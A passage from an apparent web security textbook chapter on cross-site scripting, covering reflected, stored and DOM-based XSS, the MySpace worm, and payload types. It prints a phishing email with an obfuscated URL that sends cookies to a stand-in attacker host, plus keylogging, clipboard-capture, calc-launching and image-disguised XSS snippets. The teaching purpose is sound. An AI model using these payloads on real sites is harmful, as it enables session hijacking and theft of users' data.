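    """True if both URLs share a scheme, host, and port."""
    return origin(url_a) == origin(url_b)
```

Under this check, a script delivered in the response to https://wahh-app.com/error.php shares an origin with every other page on https://wahh-app.com, whereas a script in a page hosted on wahh-attacker.com does not. That difference is what the reflected XSS attack exploits.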

The second reason why the attacker goes to the trouble of exploiting the XSS vulnerability is that step 2 of the process just described is far likelier to succeed if the URL crafted by the attacker starts with wahh-app.com rather than wahh-attacker.com. Suppose that the attacker attempts to snare his victims by sending out millions of emails like the following:

From: “WahhApp Customer Services” <[email protected]>

To: “John Smith”

Subject: Complete our customer survey and receive a $5 credit

Dear Valued Customer,

You have been selected to participate in our customer survey. Please

complete our easy 5 question survey, and in return we will credit $5 to

your account.

To access the survey, please log in to your account using your usual

bookmark, and then click on the following link:

https://wahh-app.com/%65%72%72%6f%72%2e%70%68%70?message%3d%3c%73%63
%72ipt>var+i=ne%77+Im%61ge%3b+i.s%72c="ht%74%70%3a%2f%2f%77ahh-att
%61%63%6ber.co%6d%2f"%2bdocum%65%6e%74%2e%63ookie;</%73%63ript%3e

Many thanks and kind regards,

Wahh-App Customer Services

Even to someone who is aware of the threats posed by phishing-style scams,

this email is actually fairly reassuring:

■ They are told to access their account using their usual bookmark.

■ The link they are invited to click on points to the correct domain name used by the application.

■ The URL has been obfuscated from the version in step 2, by URL-encoding selected characters so that its malicious intent is not immediately obvious.

■ The HTTPS security check will succeed, because the URL provided by the attacker is actually delivered by the authentic wahh-app.com server.
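The obfuscation is only skin deep, as a quick decoding exercise shows. The sketch below, which assumes nothing beyond Python's standard library, decodes both the link from the email and the plain URL from step 2 and compares the results. The constant and function names are ours, and both URLs are written with plain ASCII quotes.

```python
from urllib.parse import urlsplit, unquote, unquote_plus

PLAIN = (
    "https://wahh-app.com/error.php?message=<script>var+i=new+Image;"
    '+i.src="http://wahh-attacker.com/"%2bdocument.cookie;</script>'
)
OBFUSCATED = (
    "https://wahh-app.com/%65%72%72%6f%72%2e%70%68%70?message%3d%3c%73%63"
    '%72ipt>var+i=ne%77+Im%61ge%3b+i.s%72c="ht%74%70%3a%2f%2f%77ahh-att'
    '%61%63%6ber.co%6d%2f"%2bdocum%65%6e%74%2e%63ookie;</%73%63ript%3e'
)


def decoded_view(url):
    """Return (host, decoded path, decoded query) for side-by-side comparison."""
    parts = urlsplit(url)
    return (parts.netloc, unquote(parts.path), unquote_plus(parts.query))
```

`decoded_view(PLAIN)` and `decoded_view(OBFUSCATED)` are identical: the same host, the path /error.php, and the same script in the query string. Anyone, or any filter, that decodes a link before inspecting it will see straight through this kind of disguise; the casual reader of the email will not.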

If the attacker did not exploit the XSS vulnerability, but instead performed a

pure phishing attack by offering a link to his own malicious web server, many

less gullible users would suspect that it was a scam, and the attack would be

far less successful.

COMMON MYTH “Phishing scams are a fact of life on the Internet, and I

can’t do anything about them. There is no point wasting time trying to fix the

XSS bugs in my application.”

Phishing attacks and XSS vulnerabilities are entirely different phenomena. Pure

phishing scams involve creating a clone of a target application and somehow

inducing users to interact with it. XSS attacks, on the other hand, may be

delivered entirely via the vulnerable application being targeted. Many people

get confused between XSS and phishing because the methods used for delivery

are sometimes similar. However, there are several key points that make XSS a

much higher risk to organizations than phishing:

■ Because XSS attacks execute within the authentic application, the user will see personalized information relating to them, such as account information or a “welcome back” message. Cloned web sites are not personalized.

■ The cloned web sites used in phishing attacks are usually identified and shut down quickly.

■ Many browsers and anti-malware products contain a phishing filter that protects users from malicious cloned sites.

■ Most banks won’t take responsibility if their customers visit a cloned web site. They cannot disassociate themselves so easily if customers are attacked via an XSS flaw in their own application.

■ As you will see, there are ways of delivering XSS attacks that do not use phishing-style techniques.

Stored XSS Vulnerabilities

A different category of XSS vulnerability is often referred to as stored cross-site

scripting. This version arises when data submitted by one user is stored within

the application (typically in a back-end database) and then displayed to other

users without being filtered or sanitized appropriately.

Stored XSS vulnerabilities are common in applications that support interac-

tion between end users, or where administrative staff access user records and

data within the same application. For example, consider an auction applica-

tion that allows buyers to post questions about specific items, and sellers to

post responses. If a user can post a question containing embedded JavaScript,

and the application does not filter or sanitize this, then an attacker can post a

crafted question that causes arbitrary scripts to execute within the browser of

anyone who views the question, including both the seller and other potential

buyers. In this context, the attacker could potentially cause unwitting users to

bid on an item without intending to, or cause a seller to close an auction and

accept the attacker’s low bid for an item.
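
The missing defense in this scenario can be sketched as follows. This is a minimal illustration rather than the auction application's actual code: the names escapeHtml and renderQuestion are hypothetical, and the sketch assumes the stored question is placed into ordinary HTML element content (not into an attribute, URL, or script block, which need different handling).

```javascript
// Minimal HTML-encoding helper (illustrative; the name is hypothetical).
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Renders one stored question as an HTML list item, encoding it on output.
function renderQuestion(question) {
  return "<li>" + escapeHtml(question) + "</li>";
}

// A question posted by the attacker and stored by the application.
const stored = "Is this item new? <script>alert(1)</script>";
console.log(renderQuestion(stored));
```

With the encoding applied at the point of output, the browser of the seller or another buyer displays the script text as literal characters instead of executing it.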

Attacks against stored XSS vulnerabilities typically involve at least two

requests to the application. In the first, the attacker posts some crafted data

containing malicious code that gets stored by the application. In the second, a

victim views some page containing the attacker’s data, at which point the

malicious code is executed. For this reason, the vulnerability is also sometimes

referred to as second-order cross-site scripting. (In this instance, “XSS” is really

a misnomer, as there is no cross-site element to the attack. The name is widely

used, however, so we will retain it here.)

Figure 12-4 illustrates how an attacker can exploit a stored XSS vulnerability

to perform the same session hijacking attack as was described for reflected XSS.

Figure 12-4: The steps involved in a stored XSS attack

1. Attacker submits question containing malicious JavaScript

2. User logs in

3. User views attacker’s question

4. Server responds with attacker’s JavaScript

5. Attacker’s JavaScript executes in user’s browser

6. User’s browser sends session token to attacker

7. Attacker hijacks user’s session

There are two important differences in the attack process between reflected

and stored XSS, which make the latter generally more serious from a security

perspective.

First, in the case of reflected XSS, to exploit a vulnerability the attacker must

use some means of inducing victims to visit his crafted URL. In the case of

stored XSS, this requirement is avoided. Having deployed his attack within

the application, the attacker simply needs to wait for victims to browse to the

page or function that has been compromised. In general, this will be a regular

page of the application that normal users will access of their own accord.

Second, the attacker’s objectives in exploiting an XSS bug are usually

achieved much more easily if the victim is using the application at the time of

the attack. For example, if the user has an existing session, this can be immedi-

ately hijacked. In a reflected XSS attack, the attacker may try to engineer this

situation by persuading the user to log in and then click on a link that he sup-

plies, or he may attempt to deploy a persistent payload that waits until the

user logs in. However, in a stored XSS attack, it is usually guaranteed that victim

users will already be accessing the application at the time that the attack

strikes. Because the attack payload is stored within a page of the application

that users access of their own accord, any victim of the attack will by definition

be using the application at the moment the payload executes. Further, if the

page concerned is within the authenticated area of the application, then any

victim of the attack must in addition be logged in at the time.

These differences between reflected and stored XSS mean that stored XSS

flaws are often critical to an application’s security. In most cases, an attacker

can submit some crafted data to the application and then wait for victims to be

hit. If one of those victims is an administrator, then the attacker will have com-

promised the entire application.

Storing XSS in Uploaded Files

One common, but frequently overlooked, source of stored XSS vulnerabilities

arises where an application allows users to upload files that can be down-

loaded and viewed by other users. If you can upload an HTML or text file con-

taining JavaScript, and a victim views the file, then your payload will

normally be executed.

Many applications disallow the uploading of HTML files to prevent this

kind of attack; however, in most cases they allow files containing JPEG images.

In Internet Explorer, if a user requests a JPEG file directly (not via an embedded

<img> tag), then the browser will actually process its contents as HTML if

this is what the file contains. This behavior means that an attacker can upload

a file with the .jpg extension containing an XSS payload. If the application

does not verify that the file actually contains a valid image, and allows other

users to download the file, then it is vulnerable.
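
As a rough sketch of the verification step mentioned above, the following function checks whether uploaded bytes carry the JPEG start-of-image and end-of-image markers. The function name and sample data are assumptions made for illustration. A marker check of this kind is only a first filter: a crafted file could carry valid markers and still contain markup, so fully decoding or re-encoding the image on the server is a stronger test.

```javascript
// Returns true if the bytes begin with the JPEG start-of-image marker
// (FF D8 FF) and end with the end-of-image marker (FF D9).
// Deliberately strict: files with trailing bytes after FF D9 are rejected.
function looksLikeJpeg(bytes) {
  const n = bytes.length;
  return (
    n >= 5 &&
    bytes[0] === 0xff && bytes[1] === 0xd8 && bytes[2] === 0xff &&
    bytes[n - 2] === 0xff && bytes[n - 1] === 0xd9
  );
}

// An "image" upload that is really an XSS payload saved with a .jpg extension.
const htmlUpload = new TextEncoder().encode("<script>alert(document.cookie)</script>");

// A few bytes shaped like a JPEG (markers only; not a viewable image).
const jpegLike = Uint8Array.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0xff, 0xd9]);

console.log(looksLikeJpeg(htmlUpload), looksLikeJpeg(jpegLike));
```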

The following shows the raw response of an application that is vulnerable to

stored XSS in this way. Note that even though the Content-Type header specifies

that the message body contains an image, Internet Explorer overrides this

and handles the content as HTML because this is what it in fact contains.

HTTP/1.1 200 OK

Date: Sat, 5 May 2007 11:52:25 GMT

Server: Apache

Content-Length: 39

Content-Type: image/jpeg

<script>alert(document.cookie)</script>

This vulnerability exists in many web mail applications, where an attacker

can send emails containing a seductive-sounding image attachment that in

fact compromises the session of any user who views it. Many such applica-

tions sanitize HTML attachments specifically to block XSS attacks, but over-

look the way Internet Explorer handles JPEG files.

DOM-Based XSS Vulnerabilities

Both reflected and stored XSS vulnerabilities involve a specific pattern of

behavior, in which the application takes user-controllable data and displays

this back to users in an unsafe way. A third category of XSS vulnerabilities does

not share this characteristic. Here, the process by which the attacker’s

JavaScript gets executed is as follows:

■■

A user requests a crafted URL supplied by the attacker and containing

embedded JavaScript.

■■

The server’s response does not contain the attacker’s script in any form.

■■

When the user’s browser processes this response, the script is executed

nonetheless.

How can this series of events occur? The answer is that client-side JavaScript

can access the browser’s document object model (DOM), and so can determine

the URL used to load the current page. A script issued by the application may

extract data from the URL, perform some processing on this data, and then use

it to dynamically update the contents of the page. When an application does

this, it may be vulnerable to DOM-based XSS.

Recall the original example of a reflected XSS flaw, in which the server-side

application copies data from a URL parameter into an error message. A differ-

ent way of implementing the same functionality would be for the application

to return the same piece of static HTML on every occasion and to use client-

side JavaScript to dynamically generate the message’s contents.

For example, suppose that the error page returned by the application con-

tains the following:

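<script>

// Read the full URL of the current page and URL-decode it

var a = document.URL;

a = unescape(a);

// Write everything after "message=" into the page without any encoding

document.write(a.substring(a.indexOf("message=") + 8, a.length));

</script>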

This script parses the URL to extract the value of the message parameter and

simply writes this value into the HTML source code of the page. When

invoked as the developers intended, it can be used in the same way as in the

original example to create error messages easily. However, if an attacker crafts

a URL containing JavaScript code as the value of the message parameter, then

this code will be dynamically written into the page and executed in just the

same way as if it had been returned by the server. In this example,

the same URL that exploited the original reflected XSS vulnerability can also

be used to produce a dialog box:

https://wahh-app.com/error.php?message=<script>alert('xss');</script>
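
To make the mechanism concrete, the following sketch reproduces the page script's string handling as a plain function that can be run outside a browser. The function names are hypothetical, decodeURIComponent stands in for the older unescape call, and the benign URL is an invented example. The sketch shows that markup in the parameter passes through untouched, and that HTML-encoding the extracted value before writing it into the page would neutralize it.

```javascript
// Mirrors the page script: return everything after "message=" in the decoded URL.
function extractMessage(url) {
  const decoded = decodeURIComponent(url);
  const start = decoded.indexOf("message=");
  return start === -1 ? "" : decoded.substring(start + 8);
}

// HTML-encodes a value so that it is displayed as text rather than parsed as markup.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

const benignUrl = "https://wahh-app.com/error.php?message=Sorry%2C%20an%20error%20occurred";
const attackUrl = "https://wahh-app.com/error.php?message=<script>alert('xss');</script>";

console.log(extractMessage(benignUrl));              // the intended use
console.log(extractMessage(attackUrl));              // attacker's markup, unchanged
console.log(escapeHtml(extractMessage(attackUrl)));  // safe to write into the page
```

A page script that needs only to display text can avoid document.write altogether and assign the value to a text node, which never interprets it as HTML.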

The process of exploiting a DOM-based XSS vulnerability is illustrated in

Figure 12-5.

Figure 12-5: The steps involved in a DOM-based XSS attack

1. User logs in

2. Attacker feeds crafted URL to user

3. User requests attacker’s URL

4. Server responds with page containing hard-coded JavaScript

5. Attacker’s URL is processed by JavaScript, triggering his attack payload

6. User’s browser sends session token to attacker

7. Attacker hijacks user’s session

DOM-based XSS vulnerabilities are more similar to reflected than to stored

XSS bugs. Their exploitation typically involves an attacker inducing a user to

access a crafted URL containing malicious code, and it is the server’s response

to that specific request that causes the malicious code to be executed. How-

ever, in terms of the details of exploitation, there are important differences

between reflected and DOM-based XSS, which we will examine shortly.

Real-World XSS Attacks

The features that make stored XSS vulnerabilities potentially very serious are

evident in real-world examples of exploitation in the wild.

Web mail applications are inherently at risk of stored XSS attacks, because of

the way they render email messages in-browser when viewed by the recipient.

Emails may contain HTML-formatted content, and so the application is effec-

tively copying third-party HTML into the pages that it displays to users. If an

attacker can send a victim an HTML-formatted email containing malicious

JavaScript, and if this does not get filtered or sanitized by the application, then

the victim’s web mail account may be compromised solely by reading the email.

Applications like Hotmail implement numerous filters to prevent JavaScript

embedded within emails from being transmitted to the recipient’s browser.

However, various bypasses to these filters have been discovered over the years,

enabling an attacker to construct a crafted email that succeeds in executing arbi-

trary JavaScript when viewed within the web mail application. Because any

user reading such an email is guaranteed to be logged in to the application at

the time, the vulnerability is potentially devastating to the application.

The social networking site MySpace was found to be vulnerable to a stored

XSS attack in 2005. The MySpace application implements filters to prevent

users from placing JavaScript into their user profile page. However, a user

called Samy found a means of circumventing these filters, and placed some

JavaScript into his profile page. The script executed whenever a user viewed

this profile and caused the victim’s browser to perform various actions with

two key effects. First, it added the perpetrator as a “friend” of the victim. Sec-

ond, it copied the script into the victim’s own user profile page. Subsequently,

anyone who viewed the victim’s profile would also fall victim to the attack. To

perform the various requests required, the attack used Ajax techniques (see the

“Ajax” sidebar at the end of this section). The result was an XSS-based worm

that spread exponentially, and within hours the original perpetrator had

nearly one million friend requests, as shown in Figure 12-6.

As a result, MySpace was obliged to take the application offline, remove the

malicious script from the profiles of all their users, and fix the defect in their

anti-XSS filters. The perpetrator was eventually forced to pay financial restitu-

tion to MySpace and to carry out three months of community service, without

the help of his many friends.

Figure 12-6: Samy’s friends

AJAX

Ajax (or Asynchronous JavaScript and XML) is a technology used by some

applications to create an enhanced interactive experience for users. In most

web applications, each user action (such as clicking a link or submitting a form)

results in a new HTML page being loaded from the server. The entire browser

content disappears and is replaced with new content, even if much of this is

identical to what was there before. This way of operating creates a punctuated

user experience and differs greatly from the behavior of local applications such

as email clients and other office software.

Ajax enables web developers to implement a user interface whose behavior

is much closer to that of local software. User actions may still trigger a round

trip of request and response to the server; however, the entire web page is not

reloaded each time this occurs. Rather, the request does not occur as a browser

navigation event but is made asynchronously by client-side JavaScript. The

server responds with a lightweight message containing information in XML,

JSON, or any other format, which is processed by the client-side script and used

to update the user interface accordingly. For example, in a shopping applica-

tion, clicking the Add to Basket button may simply involve communicating this

action to the server and updating the “Your basket contains X items” message

at the top of the screen. The page itself is not reloaded, resulting in a much

smoother and more satisfying experience for the user.

Ajax is implemented using the XMLHttpRequest object. This object comes in

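several forms depending on the browser, but these all function in fundamentally

the same way. The following is a simple example of using Ajax within Internet

Explorer to issue a request and process its response. Because the third

argument to open is false, this particular request is synchronous and blocks

until the response arrives:

<script>

var request = new ActiveXObject("Microsoft.XMLHTTP");

// The third argument (false) makes the call synchronous

request.open("GET", "https://wahh-app.com/foo", false);

request.send();

// With a synchronous call, the response is available as soon as send() returns

alert(request.responseText);

</script>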

One very important proviso affecting the use of XMLHttpRequest is that it

can only be used to issue requests to the same domain as the page that is

invoking it. Without this restriction, Ajax could be used to trivially violate the

browser’s same origin policy, by enabling applications to retrieve and process

data from a different domain.
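
The restriction can be modeled with a short comparison. This is a sketch of the rule, not the browser's actual implementation: the function name is hypothetical, and it assumes that "same domain" is judged on the combination of scheme, host, and port, which is how browsers define an origin.

```javascript
// Returns true if requestUrl, resolved against the page's URL, has the same
// origin (scheme, host, and port) as the page that wants to issue the request.
function sameOrigin(pageUrl, requestUrl) {
  const page = new URL(pageUrl);
  const target = new URL(requestUrl, pageUrl); // also resolves relative URLs
  return page.origin === target.origin;
}

const page = "https://wahh-app.com/home";
console.log(sameOrigin(page, "https://wahh-app.com/foo"));      // same site
console.log(sameOrigin(page, "/foo"));                          // relative URL
console.log(sameOrigin(page, "https://attacker.example/foo"));  // different host
console.log(sameOrigin(page, "http://wahh-app.com/foo"));       // different scheme
```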

Chaining XSS and Other Attacks

XSS flaws can sometimes be chained with other vulnerabilities to devastating

effect. The authors encountered an application that had a stored XSS vulnera-

bility within the user’s display name. The only purpose for which this item

was used was to show a personalized welcome message after the user logged

in. The display name was never displayed to other application users, so there

initially appeared to be no attack vector for users to cause problems by editing

their own display name. Other things being equal, the vulnerability would be

classified as very low risk.

However, a second vulnerability existed within the application. Defective

access controls meant that any user could edit the display name of any other

user. Again, on its own, this issue had minimal significance: Why would an

attacker be interested in changing the display name of other users?

Chaining these two low-risk vulnerabilities together enabled an attacker to

completely compromise the application. It was trivial to automate an attack

to inject a script into the display name of every application user. This script

executed every time a user logged in to the application, and transmitted the

user’s session token to a server owned by the attacker. Some of the applica-

tion’s users were administrators, who logged in frequently and had the abil-

ity to create new users and modify the privileges of other users. An attacker

simply had to wait for an administrator to log in, hijack the administrator’s

session, and then upgrade their own account to have administrative privi-

leges. The two vulnerabilities together represented a critical risk to the secu-

rity of the application.
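
Fixing either flaw would have broken the chain. The following sketch shows the kind of ownership check that the defective access control lacked. It is an illustration under stated assumptions, not the code of the application we tested: the function name, the session object, and the in-memory user store are all hypothetical.

```javascript
// Updates a display name only when the session owner is editing their own record.
function setDisplayName(users, session, targetUserId, newName) {
  if (!users.has(targetUserId)) {
    throw new Error("unknown user");
  }
  if (session.userId !== targetUserId) {
    throw new Error("forbidden");
  }
  users.get(targetUserId).displayName = newName;
}

// Hypothetical in-memory user store.
const users = new Map([
  ["alice", { displayName: "Alice" }],
  ["admin", { displayName: "Administrator" }],
]);

// A user changing their own display name succeeds.
setDisplayName(users, { userId: "alice" }, "alice", "Alice B.");

// The same user trying to plant a script in the administrator's name is refused.
let blocked = false;
try {
  setDisplayName(users, { userId: "alice" }, "admin", "<script>/* payload */</script>");
} catch (err) {
  blocked = true;
}
console.log(blocked, users.get("admin").displayName);
```

The stored XSS flaw itself still needs to be fixed by encoding the display name on output; the check above only removes the route by which one user could reach another.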

COMMON MYTH “We’re not worried about that low-risk XSS bug — a user

could only exploit it to attack themselves.”

As the example illustrates, even apparently low-risk vulnerabilities can in the

right circumstances pave the way for a devastating attack. Taking a defense-

in-depth approach to security entails removing every known vulnerability,

however insignificant it may seem. Always assume that an attacker will be

more imaginative than you in devising ways to exploit minor bugs!

Payloads for XSS Attacks

So far, we have focused on the classic XSS attack payload, which is to capture

a victim’s session token, hijack their session, and thereby make use of the

application “as” the victim, performing arbitrary actions and potentially tak-

ing ownership of that user’s account. In fact, there are numerous other attack

payloads that may be delivered via any type of XSS vulnerability.

Virtual Defacement

This attack involves injecting malicious data into a page of a web application

to feed misleading information to users of the application. It may simply

involve injecting HTML mark-up into the site, or it may use scripts (sometimes

hosted on an external server) to inject elaborate content and navigation into

the site. This kind of attack is known as virtual defacement because the actual

content hosted on the target’s web server is not modified — the defacement is

generated solely because of the way the application processes and renders

user-supplied input.

In addition to frivolous mischief, this kind of attack could be used for seri-

ous criminal purposes. A professionally crafted defacement, delivered to the

right recipients in a convincing manner, could be picked up by the news media

and have real-world effects on people’s behavior, stock prices, and so on, to the

financial gain of the attacker, as illustrated in Figure 12-7.

Figure 12-7: A virtual defacement attack exploiting an XSS flaw

Injecting Trojan Functionality

This attack goes beyond virtual defacement and injects actual working func-

tionality into the vulnerable application, designed to deceive end users into

performing some undesirable action, such as entering sensitive data that is

then transmitted to the attacker.

An obvious attack involving injected functionality is to present users with a

Trojan login form that submits their credentials to a server controlled by the

attacker. If skillfully executed, the attack may also seamlessly log the user in to

the real application, so that they do not detect any anomaly in their experience.

The attacker is then free to use the victim’s credentials for his own purposes.

This type of payload lends itself well to a phishing-style attack, in which users

are fed a crafted URL within the actual authentic application and advised that

they will need to log in as normal to access it.

Another obvious attack is to ask users to enter their credit card details, usu-

ally with the inducement of some attractive offer. For example, Figure 12-8

shows a proof-of-concept attack created by Jim Ley, exploiting a reflected XSS

vulnerability found in Google in 2004.

Figure 12-8: A reflected XSS attack injecting Trojan functionality

Because the URLs in these attacks point to the authentic domain name of the

actual application, with a valid SSL certificate where applicable, they are far

more likely to persuade victims to submit sensitive information than pure

phishing web sites that are hosted on a different domain and merely clone the

content of the targeted web site.

COMMON MYTH “We’re not worried about any XSS bugs in the

unauthenticated part of our site — they can’t be used to hijack sessions.”

This thought is erroneous for two reasons. First, an XSS bug in the

unauthenticated part of an application can normally be used to directly

compromise the sessions of authenticated users. Hence, an unauthenticated

reflected XSS flaw is typically more serious than an authenticated one, because

the scope of potential victims is wider. Second, even if a user is not yet

authenticated, an attacker can deploy some Trojan functionality which persists

in the victim’s browser across multiple requests, waiting until they log in, and

then hijacking the resulting session.

Inducing User Actions

If an attacker hijacks a victim’s session, then they can use the application “as”

that user, and carry out any action on their behalf. However, this approach to

performing arbitrary actions may not always be desirable. It requires that the

attacker monitor their own server for submissions of captured session tokens

from compromised users, and it requires them to carry out the relevant action

on behalf of each and every user. If many users are being attacked, this may

not be practicable. Further, it leaves a rather unsubtle trace in any application

logs, which could be trivially used to identify the computer responsible for the

unauthorized actions during any investigation.

An alternative to session hijacking, when an attacker simply wants to carry

out a specific set of actions on behalf of each compromised user, is to use the

attack payload script itself to perform the actions. This attack payload is partic-

ularly useful in cases where an attacker wishes to perform some action which

requires administrative privileges, such as modifying the permissions assigned

to an account which he controls. With a large user base, it would be laborious to

hijack each user’s session and establish whether the victim was an administra-

tor. A more effective approach is to induce every compromised user to attempt

to upgrade the permissions on the attacker’s account. Most attempts will fail,

but the moment an administrative user is compromised, the attacker will suc-

ceed in escalating privileges. Ways of inducing actions on behalf of other users

are described in the “Request Forgery” section, later in this chapter.

The MySpace XSS worm described earlier is an example of this attack pay-

load, and illustrates the power of such an attack to perform unauthorized

actions on behalf of a mass user base with minimal effort by the attacker.

An attacker whose primary target is the application itself, but who wishes to

remain as stealthy as possible, can leverage this type of XSS attack payload

to cause other users to carry out malicious actions of his choosing against the

application. For example, the attacker could cause another user to exploit a

SQL injection vulnerability to add a new administrator to the table of user

accounts within the database. The attacker would control the new account, but

any investigation of application logs may conclude that a different user was

responsible.

Exploiting Any Trust Relationships

You have already seen one important trust relationship which XSS may

exploit: browsers trust JavaScript received from a web site with the cookies

issued by that web site. There are several other trust relationships that can

sometimes be exploited in an XSS attack:

■■

If the application employs forms with autocomplete enabled, JavaScript

issued by the application can capture any previously entered data that

the user’s browser has stored in the autocomplete cache. By instantiat-

ing the relevant form, waiting for the browser to autocomplete its con-

tents, and then querying the form field values, the script can steal this

data and transmit it to the attacker’s server. The same technique can

also be performed against the Firefox password manager to steal the

user’s credentials for the application. This attack can be more powerful

than injecting Trojan functionality, because sensitive data can be cap-

tured without requiring any interaction by the user.

■■

Some web applications recommend or require that users add their

domain name to the “Trusted Sites” zone of their browser. This is

almost always undesirable and means that any XSS-type flaw can be

exploited to perform arbitrary code execution on the computer of a

victim user. For example, if a site is running in the Trusted Sites zone of

Internet Explorer, then injecting the following code will cause the Win-

dows calculator program to launch on the user’s computer:

<script>

// WScript.Shell can launch local programs when the page runs in a trusted zone

var o = new ActiveXObject('WScript.shell');

o.Run('calc.exe');

</script>

■■

Web applications often deploy ActiveX controls containing powerful

methods (see the “Attacking ActiveX Controls” section, later in this

chapter). Some applications seek to prevent misuse by a third party by

verifying within the control itself that the invoking web page was

issued from the correct web site. In this situation, the control can still be

misused via an XSS attack, because in that instance the invoking code

will satisfy the trust check implemented within the control.
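
The weakness of the last trust check in the list above can be modeled in a few lines. This is a simplified sketch, not the logic of any real control: the function name and the expected host are assumptions. The point is that the check sees only the address of the invoking page, so script injected into a genuine page via XSS is indistinguishable from the application's own code.

```javascript
// Host from which the control expects to be invoked (an assumption of this sketch).
const EXPECTED_HOST = "wahh-app.com";

// Models a control's check that the invoking page came from the correct web site.
function invokerIsTrusted(invokingPageUrl) {
  return new URL(invokingPageUrl).hostname === EXPECTED_HOST;
}

// A page on the attacker's own site fails the check.
console.log(invokerIsTrusted("https://attacker.example/lure.html"));

// A genuine page carrying injected script passes, because the injected code
// runs within a page that was issued by the expected site.
console.log(invokerIsTrusted("https://wahh-app.com/error.php?message=injected"));
```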

COMMON MYTH “Phishing and XSS only affect applications on the public

Internet.”

XSS bugs can affect any type of web application, and an attack against an

intranet-based application, delivered via a group email, can exploit two forms

of trust. First, there is the social trust exploited by an internal email sent

between colleagues. Second, victims’ browsers will often trust corporate web

servers more than they do those on the public Internet — for example, with

Internet Explorer if a computer is part of a corporate domain, the browser will

default to a lower level of security when accessing intranet-based applications.

Escalating the Client-Side Attack

There are numerous ways in which a web site may directly attack users who

visit it. Any of these attacks may be delivered via a cross-site scripting flaw in

a vulnerable application (although they may also be delivered directly by any

malicious web site that a user happens to visit).

Log Keystrokes

JavaScript can be used to monitor all keys pressed by the user while the

browser window is active, including passwords, private messages, and other

personal information. The following proof-of-concept script will capture all

keystrokes in Internet Explorer and display them in the status bar of the

browser:

<script>document.onkeypress = function () {

window.status += String.fromCharCode(window.event.keyCode);

} </script>

Capture Clipboard Contents

JavaScript can be used to capture the contents of the clipboard. The following

proof-of-concept script will display an alert containing the current contents of

the clipboard:

<script>

alert(window.clipboardData.getData('Text'));

</script>

Monitoring the clipboard periodically while a user works on other tasks

might result in all kinds of information being captured. For example, there are

some secure email applications that use the clipboard when encrypting and

decrypting messages, and do not clear its contents after use. (Note that Inter-

net Explorer 7 asks the user for permission before allowing clipboard contents

to be captured, to prevent this type of attack.)

Steal History and Search Queries

JavaScript can be used to perform a brute-force exercise to discover third-

party sites recently visited by the user, and queries that they have performed

on popular search engines. This can be done by dynamically creating hyper-

links for common web sites, and for common search queries, and using the

getComputedStyle API to test whether the link is colorized as visited or not

visited. A huge list of possible targets can be quickly checked with minimal

impact on the user.
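
The logic of the check can be sketched with the browser-specific part factored out. In the following illustration, getLinkColor is a stand-in (an assumption of the sketch) for creating a hyperlink and reading its color through getComputedStyle; the colors, URLs, and simulated history are invented so that the code runs outside a browser. Note that current browsers deliberately limit what getComputedStyle reveals about visited links, so this describes the technique as it worked when it was first documented.

```javascript
// Returns the candidate URLs whose link color matches the "visited" color.
// getLinkColor stands in for rendering a link and reading its computed color.
function findVisited(candidateUrls, getLinkColor, visitedColor) {
  return candidateUrls.filter((url) => getLinkColor(url) === visitedColor);
}

// Simulated browser state (all values hypothetical).
const VISITED = "rgb(85, 26, 139)";
const UNVISITED = "rgb(0, 0, 238)";
const simulatedHistory = new Set(["https://bank.example/login"]);
const fakeGetLinkColor = (url) => (simulatedHistory.has(url) ? VISITED : UNVISITED);

const candidates = [
  "https://bank.example/login",
  "https://shop.example/",
  "https://mail.example/",
];
const visited = findVisited(candidates, fakeGetLinkColor, VISITED);
console.log(visited);
```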

Enumerate Currently Used Applications

JavaScript can be used to determine whether the user is presently logged in to

third-party web applications. Most applications contain protected pages that

can be viewed only by logged-in users, such as a My Details page. If an unau-

thenticated user requests the page, she receives different content such as an

error message or a redirection to the login.

This behavior can be leveraged to determine whether a user is logged in to

a third-party application. The injected script can issue a request for the pro-

tected page to determine its state. A key constraint here, of course, is

that although the script can make arbitrary requests, it cannot process

the responses, due to the browser’s same origin policy. However, recall that

the same origin policy treats scripts themselves as code rather than data, and

applications are allowed to load and execute scripts from a different domain.

This provides enough of a toehold for an attacker to determine what state the

protected page is in and, therefore, whether the user is logged in.

The trick is to attempt to dynamically load and execute the protected page

as a piece of JavaScript:

window.onerror = fingerprint;

Of course, whatever state the protected page is in, it contains only HTML, so

a JavaScript console error is thrown. Crucially, the console error will contain a

different line number and error type depending on the exact HTML document

returned. The attacker can implement an error handler (in the fingerprint

function) that checks for the line number and error type that arise when the

user is logged in. Despite the same origin restrictions, the attacker’s script can

thereby deduce what state the protected page is in.
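
A handler of this kind might look like the following sketch. The signature values are hypothetical: in practice they would be recorded in advance by loading the protected page as a script in each state, and they differ between applications and browsers. The handler uses the parameter order in which browsers pass arguments to window.onerror, and the final call simulates the error event so that the sketch runs outside a browser.

```javascript
// Hypothetical error signatures for one target page, recorded in advance.
const SIGNATURES = [
  { state: "logged in", line: 12, message: "Syntax error" },
  { state: "logged out", line: 3, message: "Expected ';'" },
];

// Maps an observed error to the page state that produces it.
function classify(message, line) {
  const match = SIGNATURES.find((s) => s.line === line && s.message === message);
  return match ? match.state : "unknown";
}

let observedState = "unknown";

// Error handler in the form that would be assigned to window.onerror.
function fingerprint(message, source, line) {
  observedState = classify(message, line);
  return true; // suppress the browser's default error reporting
}

// Simulate the error raised when the protected page is loaded as a script.
fingerprint("Syntax error", "https://other-app.example/MyDetails", 12);
console.log(observedState);
```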

Having determined which popular third-party applications the user is

presently logged in to, the attacker can then carry out highly focused cross-site

request forgery attacks, to perform arbitrary actions within those applications

in the security context of the compromised user (see the “Request Forgery”

section, later in this chapter).

Port Scan the Local Network

Using techniques pioneered by Jeremiah Grossman and Robert Hansen,

JavaScript can be used to perform a port scan of hosts on the user’s local net-

work, to identify services that may be exploitable. If a user is behind a corpo-

rate or home firewall, an attacker will be able to reach services that cannot be

accessed from the public Internet. If the attacker scans the client computer’s

loopback interface, he may be able to bypass any personal firewall installed by

the user.

Browser-based port scanning can use a Java applet to determine the user’s

IP address (which may be NAT-ed from the public Internet), and so infer the IP

range of the local network. The script can then initiate HTTP connections to

arbitrary hosts and ports to test connectivity. As already described, the same

origin policy prevents the script from processing the responses to these

requests. However, a trick similar to the one used to detect login status can also be

